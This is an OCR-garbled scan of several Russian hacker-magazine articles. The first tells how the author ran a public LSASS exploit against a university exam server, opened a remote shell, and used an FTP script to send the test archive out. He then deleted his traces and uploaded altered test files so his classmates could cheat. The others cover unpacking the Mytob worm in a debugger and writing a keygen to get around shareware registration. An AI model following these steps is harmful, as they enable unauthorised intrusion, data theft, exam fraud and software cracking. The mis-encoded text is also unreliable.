стояла ѴѴіпХр, поэтому я решил не терять времени и попробовать 
действие известного сплоита на эту систему, а именно: НОО- 
ІП50401 1-Ізазгѵ-ехрІ. 

Проникновение в систему 

Так как у меня уже был собранный ехе-файл сплоита, я его запус- 
тил следующей командой: 



[*] Тагдеі: ІР: 10.2.100.2: ОЗ: ѴѴіпХР РітЯеззіопаІ [ипіѵегзаі] Ізазз.ехе 
[*] СоппесІіпдЮ 10.2.100.2:445 ... ОК 
[*] АДаскіпд ... ОК 

Далее я просто подтельнетился к этой тачке на 3333 порт и увидел 
сообщение: 

МісгозоЙ ѴѴіпбоѵѵз ХР [Версия 5.1 .2600] 

(С) Корпорация Майкрософт, 1985-2001 . 

С :\ѵѵі п б о ѵѵз\зу зіе т32\> 

Вот и отлично! 
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взлом 



Конфигуратор серверной части 

настройки теста 

/2/ ТезЮиезІіоп Есіііог 

коряво написанный редактор 





Поднимаем РТР 

Пройдясь по папкам на диске С:, ничего интересного я не обнару- 
жил, зато на диске й: находилась папка с закономерным названи- 
ем ТЕЗТ5 и гаг-архив с таким же именем — по-видимому, резервная 
копия. Решено было срочно слить себе архив. Расшаривать диски 
на серваке не хотелось, так как это могло вызвать лишние подоз- 
рения даже у туповатого админа. Поэтому я заюзал РТР-сервер. 
Для этого был быстро настроен и запущен РаЫоз РТР зегѵег, ука- 
зана рабочая директория, имя пользователя и пароль — зіисіепт 
После этого я перешел в директорию ТЕЗТ8 и в консоли выполнил 
команду: 

есМо ореп 10.3.100.8 > до.М && есМо зіисіепі >> до.М && есМо зіисіепі 
>> до.М, 

Создав тем самым на атакуемой тачке текстовый файл с именем 
до и содержимым: 

ореп 10.3.100.8 

зисіепі 

зіисіепі 



10.3.100.8 — ІР моего компа. Далее я законектил удаленный ком- 
пьютер к себе на РТР командой: 

СЛРгодгат ЯІез>Йр -з:до.Ъ4 



Просмотрев лог-файл РТР сервака, я убедился, что соединение 
прошло удачно. 

Командой зепб переслал себе в рабочую директорию архивТЕЗТЗ. 
гаг. Его просмотр подтвердил, что это полная копия папки ТЕЗТЗ. 
Командой сіеі до.М были удалены следы деятельности, и содержи- 
мое успешно отправлено на флеш-карту. 

Полделауспешно выполнено — осталось изучить саму тестиру- 
ющую систему и вопросы, подготовленные преподом для экзаме- 
на. С самыми лучшими надеждами я отправился домой. 

Тестирующая система в разрезе 

Распаковав архив, я удивился: размер папки занимал около 950 
Мб. Внутри оказалось все необходимое для установления этой тес- 
тирующей системы на любой компьютер, а именно: АрасИе, база 
данных МуЗОІ_, куча различных сетевых утилит, сервер, клиент и 
редактор системы тестирования. Сначала я запустил «клиент» и 
увидел знакомое окошко, где нужно было указать ІР сервера для 
подключения. Выпадающий список Ф.И.О. и групп был пуст. На 
этом изучение клиентской части было завершено. 

Перешел к следующему «редактору» . Запустив его, я сразу по- 
нял, что вся эта система наверняка написана студентами старших 



курсов. Интерфейс «редактора» был просто ужасен: множест- 
во маленьких окон в одном, какой-то экзотический шрифт, а при 
развороте на весь экран бедный «редактор» вообще зависал, не 
говоря уже о кнопочках, которые на моем мониторе с разреше- 
нием 1600x1200 просто куда-то пропадали или отображались на- 
половину. Нащупав в строке меню пункт «отрыть», я увидел, что 
редактор переваривает файлы формата *.фТ С таким расшире- 
нием они были быстро найдены. Файлов оказалось порядка 40 -ка 
штук, и каждый назывался, как соответствующий раздел учебной 
программы. Скормив один из таких файлов редактору, я увидел все 
его содержимое: 40 вопросов с вариантами ответов. Здесь же мож- 
но было указывать, какие из вариантов ответов являются верными. 
Каково же было мое удивление, когда я увидел, что многие ответы 
помечены как правильные, хотя на деле таковыми не являются! Те- 
перь стало понятно, почему препод так яростно всех заверял, что 
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/31 РаЫо’з РТР Зегѵег 

в работе 




|- 



Другие РТР серверы: 

АІех’з РЩ Зегѵег: ІіДр:/Аллллл/.аІех. 
ІеесІЬаск.пеІ/ 

РТР Зегѵ-Ц: ЬіШУАллллллЙрзегѵ- 
ц.сот/ 

ѴѴРТРР Рго Зегѵег: Ийр:/Аллллл/. 
ѵѵІШсІ.сот/ 

РТРРизИ: ИПр://ѵѵѵѵѵѵ.ІШгизІі. 



ющий список с Ф.И.О. и группой остался пустым. Не было данных 
заполняющих эти списки. Тут стало понятно, что папка МуЗОІ_ не 
зря находилась вместе с системой тестирования. Я запустил файл 
МуЗОІ_сІ-тах.ехе и опять попробовал подключиться. На этот раз 
все прошло отлично. Выпадающие списки заполнились нашими 
Ф.И.О. и группами. После нажатия кнопочки «Подключиться» яуви- 
дел окно с названиями тем тестирования и быстро выбрал одну из 
них. Великолепно! Присмотревшись, во всех неправильных отве- 
тах можно было увидеть жирную букву. Моментом, даже не вчиты- 
ваясь в вопрос, я начал расставлять галочки напротив немеченых 
ответов. А вот и первый глюк. 



100% на тестировании получить невозможно:). На этом, конечно, 
можно было уже остановиться . Есть вопросы , есть ответы — садись 
и учи простую комбинацию вопрос-ответ. Так и сделали некоторые 
из моих одногруппнков (особенно женского пола). Как показали 
подсчеты, всего в системе было около 1 000 вопросов, у каждого — 
по 5 — 7 вариантов ответов. Лично мне выучить столько комбинаций 
вопросов-ответов не представлялось возможным. Нужно было что- 
то делать, но что? 

Приручаем систему тестирования 

Самый простой способ — это пометить правильные ответы на конк- 
ретный вопрос. По этому поводу было очень много разных мыслей: 
сделать все правильные ответы с заглавной буквы или поставить 
после них точку. Но это было слишком явно. И тут у меня возникла 
идея, которая покажется некоторым ламерской: во всех правиль- 
ных ответах одну букву сделать жирной, а еще лучше, для подстра- 
ховки, в неправильных. Одна жирная буква в длинном предложе- 
нии ответа практически незаметна. Делать пометки в «редакторе» 
возможности не было. Один из Рф-файлов я открыл блокнотом, и 
заметил, что он состоит в основном из НТМЬ-кода, а еще непонят- 
ных тэгов и переменных, не имеющих никакого отношения к НТМ1_. 
Метить каждый вопрос в блокноте было бы слишком долго и утоми- 
тельно, поэтому я использовал РгопіРаде. Вопрос в нем приобре- 
тал вид чем-то похожий на НТМІ_-страницу, и помечать ответы стало 
гораздо удобнее и быстрее. Все Рф-файлы я заменил измененными. 
Осталось проверить, как прижились подкорректированные файлы 
в тестирующей системе. 

Проблемы подключения 

Для этого я запустил уже заранее сконфигурированный препо- 
дом сервер АрасНе, загрузил сервер тестирующей системы и вы- 
звал клиентское окно для подключения. Вбил в нем ІР 127.0.0.1, 
нажал «Подключиться» и... облом: сообщение невозможно было 
соединить с сервером. В чем же дело? А дело в том, что выпада- 



Дисковые хлопоты 

В вопросах, где должен отображаться рисунок, он отсутствует. 
Вся систематестирования виснете сообщением о невозможности 
создания временного графического файла на диске Р:. Все понят- 
но: в универе диск Р: является общим сетевым с правами досту- 
па на чтение и запись. Вероятно, поэтому именно на нем система 
и создавала временные файлы. Конечно, можно было бы найти, 
где именно прописано использование диска Р: , но на это не было 
времени и желания. В таких случаях, если у тебя ѴѴіпХР, проще сде- 
лать так, как сделал я — пойти в реестр по адресу: НКІ_М/ЗѴЗТЕМ/ 
МоипІесЮеѵісез и изменить букву одного из своих дисков на ту, ко- 
торая нам нужна, после чего рестартнуться. 

Запустив систему я убедился в том, что все работает отлично. 
Рисунки в вопросах отображаются. Внимательно всматриваясь 
в монитор, я расставил галочки согласно пометкам. Результат не 
заставил себя долго ждать — все глюки исчезли. 

Подготовка 

За день до экзамена, скинув на флешку меченые вопросы, я от- 
правился в универ. Используя все тот же сплоит, я получил доступ 
к командной строке, после чего удалил все файлы *.Рф, поднял 
РТР-сервак и командой деі ІіІепате.Рф залил меченые файлы. Уда- 
лив следы деятельности, уведомил одногруппников о несложности 
экзамена по этому предмету и смело отправился домой спать, так 
как к экзамену я уже отлично подготовился. 

Выводы 

Не стану тебе рассказывать о том, как хорошо прошел экзамен, 
как был удивлен препод высоким уровнем знаний в группе и сколь- 
ко благодарностей я получил от друзей и подруг. Скажу только, что 
системы тестирования, какими бы сложными и оригинальными они 
не были, могут быть взломаны, изменены и использованы в своих 
целях. Надеюсь, из истории моего взлома тебе стало понятно, что 
при желании тебя могут легко подставить и свести все твои знания 
к нулю. =н= 
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ВОКІѴ 

/ВОКІѴ@ѴА№ЕХ.іиі / 



Взлом / 03 

Сам себе антивирус 

Распаковка и анализ сетевого червя УУ1п32.Му1~оЬ.Р 




Хвост 

модуль защиты: скрытие в 
системе, обход антивирусов, 
протоколирование работы 



Половой орган 

сплоит для загрузки червя на 
другие компьютеры 



Гладкая мышца 

дополнительные несетевые 
модули: мэйл-граббер, установка 
тулбаров 



Главное тело 

набор модулей, выполняющих 
те или иные сетевые функции 
(сокс-сервер, спам-моуль, йсІоЗ- 
модуль) 



В последнее время у вирмейкеров появился новый 
тренд: защищать своих паразитов разнообразными 
протекторами, чтобы Е. Касперский не понял, как 
вирус работает. Но нас с тобой это не остановит. Се- 
годня мы распакуем МуюЪ.В и разберемся, как он 
функционирует . 



Паразит 

Взять, к примеру, довольно популярного зверя МуІоЬЮ. Попадет 
к тебе такой, и что ты будешь делать? На аверов молиться? Это не 
наши методы, Шура! Его надо своими средствами вскрыть, иссле- 
довать и нафиг из системы удалить. Однако пассивным дизассем- 
блированием тут не обойдешься. Іба Рго тебе не выплюнет ничего 
членораздельного в ответ на скормленного ей червяка. В данном 
случае такая шняга произойдет потому, что вирус долго и усердно 
паковали и защищали. Благо, мы знаем, как в таких случаях посту- 
пать: грузим РЕЮ. 

Порывшись в своей базе сигнатур, замечательная тулза вы- 
даст нам верхний слой защиты — уосіа'з Ргоіесіог 1 .3 -> АзИкЬіг 
ЭапеИкаг. Этот протектор, по правде говоря, просто обожают 
разработчики разного рода нечести. Вот, посмотри, что о нем 
пишут: 

- поддержка большинства форматов РЕ-файлов; 

- маленький размер дистрибутива; 

-быстрота работы; 

- полиморфное шифрование; 

- проверка СВС-суммы; 

- переадресация АРІ-функций; 

- удаление заголовков РЕ; 

- антиотладчик; 



И со всем этим предстоит разобраться. Но это еще не все. Если 
внимательно посмотреть на названия секций (ІІРХО, ІІРХ1, ІІРХ2, 
уС), можно сделать один не самый утешительный вывод. Под йодой 
живет ІІРХ. Ок, нет проблем, и его порвем. Вспоминаем основы сня- 
тия защит и принимаемся за работу. 

1 . Нахождение оригинальной точки входа (ОЕР). 

2 . Снятие дампа программы. 

3. Восстановление таблицы импорта. 

Нахождение оригинальной точки входа 

Первое, что нам необходимо, — это найти ЕР упакованного червя, 
а затем уже ОЕР самого червя. Надеюсь, у тебя уже стоит замеча- 
тельный ОІІуЭЬд. Запускаем и открываем в нем червя. Стоп ! Чуть не 
забыл. Советую проводить все опыты на виртуальной машине, так 
как активный анализ (то есть с запуском) вирусного кода — штука 
достаточно опасная. Итак, отладчик попросит проанализировать 
файл — нажимаем «нет». Курсор отладчика стоит здесь на ЕР: 

0041В060РІІ5Н ЕВР 

0041В061МОѴ ЕВР, ЕЗР 

0041 В063 РЕІЗН ЕВХ 

0041В064РІІ5Н ЕЗІ 

0041В065РІІ5Н ЕЭІ 

0041 В066 РУЗНАй 
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На нашем диске ты найдешь 
полные версии программ, 
описанных в этой статье. 



Информацию по исследованию Если ты распаковывал «червя», то не забудь унич- 
ПО можно получить на сайте тожить процесс ѵѵісітдг.ехе и удалить файл С:\ 
ѵѵѵѵѵѵ.сгаскІаЬ.ги УУ1ЫРОУУЗ\5У51ет32\уу1с1тдг.ехе. 




Широкое кольцо 

склад данных (ресурсов). Готовые 
библиотеки находятся внутри 
исполняемого файла (чаще всего 
тулбары) 



Шея 

шина связи между ядром и осталь- 
ными модулями 



Г олова 

управляющий центр. Ядро червя 
гетоіе вГіеІІ для приема/передачи 
команд 



Почти все распаковщики перед своей работой сохраняют все 
значения регистров в стеке командой РЕІЗНАР, а после работы 
восстанавливают их командой РОРАО. То есть ниже нужно найти 
команду РОРАР и поставить на ней брейкпоинт. Если мы начнем 
трассировку программы или просто запустимся по Р9, то срабо- 
тает исключение, в результате которого отладчик или выдаст 
ошибку, или просто закроется. Причина кроется в распаковщи- 
ке: он получает информацию о том, что программа отлаживается 
в данный момент. Ключом является функция ѴѴіпбоѵѵз под назва- 
нием ІзРеЬиддегРгезепІ, благодаря чему нас и обнаруживает рас- 
паковщик. Данная функция возвращает единицу, если отладчик 
обнаружен, и ноль — если нет. Вбиваем в командной строке Оли 
Ьр ІзРеЬиддегРгезепІ и нажимаем «Епіег». Если у тебя командная 
строка не активирована — нажимай АІі+РІ . Остается запустить 
программу и надеяться на то, что бряк заработает. Как ни странно, 
он сработал, и мы оказываемся здесь: 

7С812Е03 МОѴ ЕАХ, ОѴѴОРО РТР Р3:[18] 

7С812Е09 МОѴ ЕАХ, ОѴѴОРО РТР 03: [ЕАХ+30] 

7С812Е0С МОѴХХ ЕАХ.ВУТЕ РТР 03:[ЕАХ+2] 

7С812Е10 РЕТЫ 

Пройдем до РЕТІЧ по Р8. Вот посмотри: значение регистра ЕАХ рав- 
но единице — это результат работы функции ІзОеЬиддегРгезепІ, то 
есть отладчик обнаружен. Кликни по регистру ЕАХ в отладчике и 
введи вместо единицы ноль. Дальше можешь выходить из функции 
по Р8. Вышел? Смотрим дальше — видим код: 

0041 В88С Н ЗНОРТ МуЮЬ.0041В890 
0041 В88Е РОРАО 
0041 В88Р РЕТЫ 

Интересное место. Если отладчик обнаружен, то переходим на 
команду РОРАО, где искусственно создается исключение, так как 
РОРАО отработал раньше времени! Но мы обманули протектор и 
поэтому спокойно перепрыгиваем ловушку. Теперь давай искать 
дальше РОРАО’ы. Сразу скажу — это примерно на 40 строк вниз. 

0041 В8Р9 РОРАО — ставим брейкпоинт 



0041 В8РА ЖР ЗНОРТ МуЮЬ.0041 В8РЕ 
0041 В8РС ІІ\ІТ 1 
0041 В8РЕ РЕТЫ 

Посмотрим еще ниже и опять: 

0041 В975 РОРАО — ставим брейкпоинт 

0041 В976 РГІЗНЕАХ 

0041 В977 ХОР ЕАХ, ЕАХ 

0041 В979 РТІЗН ОѴѴОРО РТР РЗ: [ЕАХ] 

0041 В97С МОѴ ОѴѴОРО РТР РЗ: [ЕАХ], ЕЗР 
0041 В97Р ОМР ЗНОРТ МуЮЬ.0041 В982 

Каквидишь,яустановилбрейкпоинтынадванайденныхмной вызо- 
ва РОРАО. Делай то же самое и запускай программу. Оля останови- 
лась на 0041 В975, а дальше (0041 В982) идут команды, которых не 
было,когдамысмотреликодпослеостановкинаІзЮеЬиддегРгезепІ 
(полиморфный код для сокрытия ЕР црх)! Команда РОРАО отра- 
ботала, а значит, где-то рядом должен быть нужный нам переход. 
Пройдемся по Р8 и посмотрим, что же будет дальше. По адресу 
0041 В982 происходит исключительная ситуация, проходим ее по 
ЗЫІІ+Р8 и попадаем в системную библиотеку пібіі: 

7С90ЕАР0 МОѴ ЕВХ, ОѴѴОРО РТР 33:[ЕЗР] 

7С90ЕАРЗ РГІЗНЕСХ 
7С90ЕАР4 РТІЗНЕВХ 
7С90ЕАР5 САІ_І_ ПЙІІ.7С9377С1 
7С90ЕАРА ОР АІ_,АІ_ 

7С90ЕАРС ЗЕ ЗНОРТ ПЙІІ.7С90ЕВ0А 

7С90ЕАРЕ РОР ЕВХ 

7С90ЕАРР РОРЕСХ 

7С90ЕВ00 РОЗНО 

7С90ЕВ02 РОЗНЕСХ 

7С90ЕВ03 САПпЙІІ.ХѵѵСопІіпие 

Скажу сразу: если пройти САП (7С90ЕВ03) по Р8, то программа за- 
пустится, азначит, мы дойдем до адреса 7С90ЕВ02(Е8) и посмотрим 
содержимое стека. Если не знаешь, что это такое, то тебе рановато 
еще читать эту статью. Будем искать адрес, который меньше, чем 
ЕР протектора (0041 В060). Просмотрим правое нижнее окно Оли 
(стек): 
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взлом 




0012Р07С 7С91 0738 Ш6ІІ.7С91 0738 
0012Р080 РРРРРРРР 
0012Р084 20008332 

001 2Р088 7С90ЕВ94 пІсІІІ.КіРазіЗузІетСаІІРІеІ 
0012Р08С 0012РРВ0 
0012Р090 00000000 
0012Р094 0012РРС0 

0012Р098 00419910 МуІоЬ. 0041 991 0 — этот адрес нам подходит! 
0012Р09С 0000001В 

0012РОА0 00010246 ШІСОйЕ "_Н05Т_СНЕСК=І\І0" 



Итак, сравним: 

00419910 — найденный нами адрес. 

0041 В060 — ЕР протектора. 

Ух, я уже на ЕР ІІРХ! Ты еще нет? Тогда быстрей ставь брейкпоинт 
на 00419910 (Ьр 00419910), дави Епіег, потом Р9 — и ты со мной. 
Если увидишь кучу нулей, то нажми СігІ+А - оля проанализирует 
код и выплюнет тебе его в удобноваримом виде. Тут уже совсем 
все просто: надо всего лишь распаковать ІІРХ. 

00419910 РЕІ5НАО — стоим здесь 

00419911 МОѴ ЕЗІ,МуІоЬ.0040Р000 

00419916 ЕЕАЕОІ,ОѴѴОРЮРТРтЗ:[ЕЗІ+РРРР2000] 

0041991С РЕІ5НЕОІ 
0041991 0 ОРЕВР, РРРРРРРР 
00419920 ЛѴІР ЗРЮНТ МуІоЬ. 0041 9932 



Опять знакомая команда РІІЗНАО! Теперь крутим мышкой вниз, 
пока не увидим: 

00419А67 РОРАй 

0041 9А68 ЛѴІР МуІоЬ.0040А0ЕВ <- это ОЕР "червя" 

0041 9А60 Айй ВУТЕ РТР 03:[ЕАХ],АЕ<-а куча этих строк не даст оши- 
биться! 

00419А6Р Айй ВУТЕ РТР 05:[ЕАХ],АІ_ 



Ставим брейкпоинт на РОРАО 0041 9А67, нажимаем Р9 и два раза 
Р7. Все. Мы находимся на ОЕР «червя». Запишите это значение (у 
меня это 0040 АО ЕВ). 

Дамп 

Для дампа воспользуемся программой РЕ Тооіз. Перед тем как 
снять дамп, давай проведем некоторую настройку самой про- 
граммы. Заходи в Орііопз программы и смотри. Внутри панели 
Тазк Ѵіеѵѵег флажок должен стоять только напротив РиІІ битр: Тіх 
Неабег. После того как ты это сделаешь (а я это уже сделал), мы 
с тобой продолжим. Выбираем из списка процессов червя -->, в 
контекстном меню жмем Оитр РиІІ. Думаю, с вводом имени файла 
проблемы возникнут только у безруких инвалидов :). Сперва необ- 
ходимо провести небольшую оптимизацию данных. Как ты знаешь, 
наш протектор изменил имена всех секций, однако тут все понятно: 
первые две секции — это секции кода протектора и распаковщика 
ІІРХ, остальное — нормальная программа, просто переименован- 
ная. РІажимаем меню ТооІз->РЕЕбі1ог и указываем «червя». Теперь 
обрежем лишние секции протектора и упаковщика, про которые 
я только что сказал. Видишь кнопку Зесііопз? РІажимай и обрезай 
две нижние секции с именами ІІРХ2, уС кнопкой в меню КіІІ зесііоп 
({гот {Не). Ну вот, теперь мы снова вместе. После восстановления 
импорта, описанного ниже, можно сделать гебиііб (кнопка гебиііб 
ре), далее оптимизируется РЕ-заголовок файла, что может умень- 
шить его размер на несколько килобайт, к тому же происходит оп- 
тимизация внутренней структуры и расположения данных в файле. 
Также можно воспользоваться гебиііб для восстановления файла 
после распаковки протекторов и упаковщиков. 

Восстановление импорта 

Импорт мы будем восстанавливать с помощью одной замечатель- 
ной программы — Ітрогі Весопігисіог. После запуска найди в спис- 
ках процессов нашего «червя» (если ты уже все закрыл, то придет- 
ся запускать файл С:\ѴѴІМОО\А/8\зуз1:ет32\ѵѵ{бтдг.ехе). 

Теперь нам необходимо указать РѴА ОЕР (в ІтрПес он просто 
ОЕР). Формула тут проста, как іпі 21 И — «РѴА ОЕР = ѴА ОЕР — 
ІтадеВазе». Это надо знать наизусть! Ітаде Вазе находится все 
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/ 2 / /1 ОІІуЭЬд 

так работает обнаружение отладчика 

/2 ОІІуЭЬд 

процессорные ресурсы, отслеживаемые І\ІТ 



в том же РЕТооІз, в главном окне. В нашем случае РѴА = 01006420 
- 01000000 = 6420. Вводим это значение в поле ОЕР и нажимаем 
кнопку ІАТ АиІоЗеагсИ (то есть автопоиск). Программа найдет ссыл- 
ки на функции таблицы импорта, затем мы получим саму таблицу, 
нажав на кнопку «(Эе! Ітрогіз» (Получить импорты). Мы должны 
увидеть строки с функциями и надписью УЕЗ напротив. Если все 
так, атак и должно быть, то кнопка Ріх Эитр направляет нас на путь 
истинный. Указывай наш дамп в появившемся окне — и вуаля. Все 
готово! 

Уроки анатомии 

Что теперь? Теперь приступаем к исследованию. Перед нами, как 
ты видишь, голый вирус. Если не веришь, то запусти РЕЮ. Надо от- 
метить, что до этого мы занимались крэкингом, то есть распаковы- 
вали файл и снимали защиту. Сейчас же перейдем к реверс-инже- 
нерингу. Реверс — далеко не крэкинг. Это более фундаментальное 
понятие, которое заключается в (да простят меня боги за тавтоло- 
гию) понимании работы программы, исходя из дизассемблерного 
листинга. Углубляться в это дело мы сейчас не будем, так как нас 
интересуют только некоторые моменты: как существует вирус, что 
он делает и где живет в системе. Конечно, есть множество антиот- 
ладочных ухищрений, но в этом случае все не так просто. Прежде 
всего в таблице импорта содержатся функции работы с сетью. 
Сперва идут функции работы с файлами — вот их-то мы и рассмот- 
рим для начала. Давай поставим бряки на СгеаіеРіІе и СоруРіІе. За- 
пускаем! Видим перед собой очень хорошую строку: 

00407ВА4 РР15 24114100 САШ ОѴѴОРЮ РТР 03:[<&кегпеІ32. 
СоруРіІеА>>; кегпеІ32.СоруРіІеА 

Если посмотрим в стек, то можем увидеть новое имя файла: 
ЫеѵѵРіІеЫате = «С:\\А/ІМОО\А/3\зузІет32\ѵѵІсІтдг.ехе». Теперь по- 
нятно: вирус проверяет, где он находится, и если он не в системной 
директории, то копирует себя в нее. Далее следует запуск вышеу- 
казанного файла и завершение исходного процесса. Для дальней- 



шего продолжения исследования следует обмануть вирус. Можно 
скопировать его, куда он просит, а можно просто-напросто обойти 
функцию проверки — это как тебе будет угодно. Я лично скопи- 
ровал. Так, едем дальше — ЭеІеіеРіІе. Что же он удаляет? РІашел 
или подсказать? Первой же функцией он удаляет С:\\Л/ІІ\ЮОѴѴ5\ 
зузІет32\тзптздг.ехе, затем копируетсебя вэту папку и открывает 
сокетное соединение. Кроме этого, червяк гадит в реестре. О, вижу 
ты уже совсем вошел в раж и поставил бряки на РедОрепКеу! 



00403Р90 51 
00403Р91 6819000200 
00403Р96 6А00 
00403Р98 52 
00403Р99 6801000080 
00403Р9Е РР1 5 081 041 00 



РЕІЗН ЕСХ 
РЦІ5Н 20019 
РІІ5Н0 
РЦІ5Н ЕЭХ 
РІІ5Н 80000001 

САШ ОѴѴОРЭ РТР Э3:[<&асіѵарі32. 



РедОрепКеу>; абѵарі32.РедОрепКеуЕхА 



Угу, функция есть, смотрим стек: 



00Е7РЕ44 80000001 ІРіКеу = НКЕѴ_СШРЕМТ_ІІ5ЕР 

00Е7РЕ48 00Е7РЕ60 ІЗиЬкеу = "ЗоПѵѵаге\МісгозоП\\/ѴАВ\ѴѴАВ4\ѴѴаЬ Рп. 

Мате" 

00Е7РЕ4С 00000000 ІРезегѵесШО 
00Е7РЕ50 00020019 ІАссезз = КЕѴ.РЕАЭ 
00Е7РЕ54 00Е7РЕ58 ХрНапсІІе = 00Е7РЕ58 

Следует ли объяснять, что происходит в этот момент? Червь 
ищет ѴѴАВ-файлы. Это же файлы адресных книг аутглюка! Да-да, 
«червь» грабит все мыльники и рассылает себя по ним. Дальшеуже 
просто: все делаем аналогично, так что писать тут про остальные 
функции я не буду. Однако мы пропустили работу червя с сетью. . . 
Извини, но в эту статью уже не поместится полный анализ. Думаю, 
доматы с легкостью сможешь и сам это проанализировать. Каркас 
действий мы с тобой разработали. Итак, мы сделали простейший 
анализ за 1 5 минут, не правда ли здорово? Еще 1 5 — 20 минут таким 
темпом — и вирус у нас полностью обезврежен. Может быть, пора 
сделать свою антивирусную лабораторию? зс 
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АВА 



Взлом /° 4 

Готовим 

кейген 

Поиск алгоритма генерации ключей регистрации 



Как готовить подопытного кролика? 

В качестве объекта исследования я выбрал довольно известную 
программу 011 Мѳіѳг ѵ.3.07 ЬиіІсІ 200. Утилита, безусловно, нужная. 
Кто озабочен подсчетом интернет-трафика, тот меня поймет. Я сам 
ей пользуюсь, так что рекомендую. Причем ключ у тебя будет сде- 
лан своими руками. 

Дляначалапосмотримнарегистрацию. Представляетонасобой 
ввод лицензионных данных: имя пользователя и серийный номер. 
Я для интереса попробовал что-нибудь ввести. Окошко о непра- 
вильном серийном номере меня несказанно порадовало, да еще 
и программа продолжала работать, так что можно было вводить 
новый серийник. Почему порадовало? Да просто вместо сообще- 
ния о неверном номере можно было увидеть закрывшуюся прогу, 
просьбу о перезапуске или, вообще, ничего не увидеть и только до- 
гадываться, угадал ли ты пароль с первого раза или нет. Конечно, 
это бы особых проблем не прибавило, но, как говорится, мелочь, а 
приятно. Затем определим, на каком из языков программирования 
написана программа — это очень важный момент, ведь подходы ко 
взлому ПО, написанного, например на ѴізиаІВазіс.даещеискомпи- 
лированные в р-собе, существенно отличаются от подходов, при- 
меняемых к программе, разработанной в Оеірбі или С++. Заодно 
проверим наличие или отсутствие упаковщика/протектора. Помо- 
жет нам в этом утилита РеЮ или любой дизассемблер. Но не стоит 
особенно полагаться на честность анализаторов — нужно уметь 
определять это самому. Ладно, придет с опытом. А пока обратимся 
к РЕЮ и посмотрим наегоответ — Вогіапб ОеІрИіб.О — 7.0. Что ж, на 
этот раз он прав — это именно ОеІрИі. Посмотрим еще на наличие 
в коде криптоалгоримов, поможет в этом опять РЕЮ, а точнее его 
плагин КАЫА1_. Видим два алгоритма СРС32, причем таблица кон- 
стант генерируется во время выполнения программы. Запомним, 
так как в дальнейшем это нам пригодится. Теперь определимся с 
инструментами. Нам нужны дизассемблер, отладчик, блокнот, ну 
и конечно, знания и наличие одного из языков программирования 
(для написания кейгена). В качестве дизассемблера и отладчика 



я буду использовать ОМуЮЬд 1.10. Из дизассемблеров можно по- 
советовать еще ЮА Рго — безусловно, лучший в своем роде. А так 
как «наша» программа написана на ЮеІрНіі , то в качестве вспомо- 
гательного инструмента воспользуемся ОеОе — декомпилятором 
ОеІрИі-приложений. Последние версии всех используемых утилит 
можно скачать с сайта сгаскІаЬ.ги из соответствующего раздела. 
Поручим пока ОеОе декомпилировать нашу прожку, а сами можем 
отдохнуть. 

Начинаем 

Теперь внимательно посмотрим на результат работы ОеОе. 

Нам будут интересны формы ТбІдВедѴѴіг — диалог регистрации 
и ТсІІдІІсоггесіЗегіаІ, — а особенно обработчики событий нажатия 
клавиш в этих процедурах, точнее в первой. Если кто забыл, то 
можно еще раз проверить, что сообщение о неверно введенном 
коде появляется после нажатия кнопки Ыехі, поэтому смотрим 
ЫпЫехЮІіск. Обработчик нажатия клавиши Ыехі: будет находить- 
ся по адресу: 00494А2С. В процессе регистрации нам нужно было 
дважды нажимать эту клавишу: при выборе регистрации и после 
ввода лицензионной информации, поэтому нас интересует только 
последнее событие. Теперь можно посмотреть, как будет происхо- 
дить считывание и проверка введенных данных под отладчиком, не 
забывая посматривать на листинг ОеОе. Чтобы немного облегчить 
читаемость кода в ОІІуЮЬд, можно воспользоваться одним из ее 
плагинов — (ЗСЮІІР. Он работает с сигнатурами от ЮА и значитель- 
но улучшает общую читабельность кода. Можно сравнить один ку- 
сочек кода до и после использования плагина. 

Откроем 01) Меіег в ОМуЮЬд, поставим Ьгеакроіпі на адрес 
00494А2С и запустим прогу под отладчиком. Не забудь, что пер- 
вый раз сработает наша точка останова при выборе метода ре- 
гистрации, поэтому по Р9 отпустим программу работать дальше. 
Ну что, вводим наше имя и любимый пароль и жмем Ыехі? Вот и 
остановилисьтам, где нужно. Теперь главное — вычленить из всего 
кода только тот, который и отвечает за проверку регистрационных 



Кейген с белыми грибами 

1 кейген, соль, молотый перец, 50 г жира, 200 г белых грибов, 1 ст. ложка муки, 

2 ст. ложки сметаны, петрушка и укроп. 



Хорошо очищенный кейген просушить полотенцем (салфеткой), разделить на порции, обжарить на растопленном 
жире, залить горячей водой или бульоном, посолить, посыпать перцем и тушить под крышкой. Белые грибы разрезать 
и обжарить в масле, соединить с кейгеном и все вместе тушить до готовности. Жидкость загустить мукой, смешанной 
со сметаной. Подавать кейген в глубокой посуде. В качестве гарнира подать отварной картофель, соленые огурцы. 
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Вообщѳ-то, нарушение авторских прав — штука 
незаконная, поэтому не стоит повторять все представ- 
ленное в статье дома. 



Вечный бой продолжается. . . Начало ему положила про- 
грамма, за которую автор хотел получить деньги. Кто-то 
платить отказывался, кто-то не мог, вот и нашлись свет- 
лые головы, захотевшие разобрать внутренности наглой 
проги, и посмотреть, почему именно она не хочет рабо- 
тать так, как «нормальное» бесплатное ПО. Конечно, 
это все мои фантазии, и, возможно, все было совершен- 
но не так, но одно совершенно точно: бой продолжается 
по сей день и, по -видимому, не закончится никогда. 
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взлом 




данных. Пройдемся теперь по коду по Р8, не заходя в процедуры и 
не вдаваясь в исполняемые команды. Получаем наше ненавистное 
окно по адресу: 00494ААВ. Что ж, попробуем еще раз нажать ІЧехІ, 
но уже посмотрим более внимательно процедуру, вызываемую по 
адресу: 00494ААВ. Вот похоже то, что нам нужно. Смотрим код: 

00494520 РІІЗН14 

0049452Р САШ <ЛѴІР.&кегпеІ32.5Іеер> 

00494534 МОѴ ЕАХ.ОѴѴОРО РТР 03:[4Р4418] 

00494539 МОѴ ЕАХ.ОѴѴОРО РТР 03:[ЕАХ] 

0049453В САШ <00МеІег.@Еогтз@ТАррІісаІіоп@Ргосе55Ме55аде5$ддгѵ> 
00494540 ОЕСЕЗІ 

00494541 ЗІ\ІХ ЗНОРТ ОЕІМеІег.00494520 

Это цикл, назначение которого — задержка после ввода данных 
и имитация долгого расчета. РІам этот цикл совершенно не нужен. 
Чуть ниже видим получение наших введенных данных. Особенно 
наглядно это видно в листинге ОеОе. 

Все свои размышления и догадки тутже проверяем в отладчике. 
Для удобства я все время снимаю ранее установленные бряки и 
ставлю новые ближе к нужному месту, чтобы не терять время на 
трассировку уже изученного кода. Поэтому можно ставить чуть 
ниже бестолкового цикла, где-нибудь на адрес 00494543, и прой- 
тись по коду. Проверка видаСМР ЭѴѴОВО РТР 33:[ЕВР-20],0 после 
